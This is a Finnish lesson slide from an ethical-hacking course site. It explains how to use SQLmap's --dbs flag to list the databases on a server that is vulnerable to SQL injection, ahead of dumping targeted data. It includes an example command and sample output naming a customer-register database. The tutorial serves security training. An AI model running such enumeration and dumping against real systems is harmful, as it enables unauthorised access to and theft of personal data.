HAKATEMIA
18Työkalut

SQLmap ja tietokantojen lukeminen

Helppo15MIN

Kun SQLmap löytää injektion, on tärkeää ymmärtää tietokannan rakenne ennen datan dumppausta.

  • Mitä tietokantoja on olemassa?
  • Mitä tauluja niissä on?
  • Mitä sarakkeita taulut sisältävät?

Näiden vipujen avulla saadaan selkeä kuva tietokannasta ja voidaan kohdistaa dumppaus vain kriittisiin tietoihin.

--dbs – listaa tietokannat

Ensimmäinen vaihe on selvittää, mitä tietokantoja palvelimelta löytyy.

Esimerkki:

BASH
1sqlmap -u "http://sivu.fi/hae.php?id=1" --dbs

Tulos:

BASH
1available databases [3]:
2[*] information_schema
3[*] asiakasrekisteri
4[*] tuotetiedot

Kaikki käytettävissä olevat tietokannat.

1 / 11
Hakatemia Pro

Hakkeroinnin oppiminen alkaa tästä

Sadat interaktiiviset kurssit, virtuaalilabrat ja CTF-haasteet selaimessasi. Aloita ilmainen kokeilu ilman korttitietoja.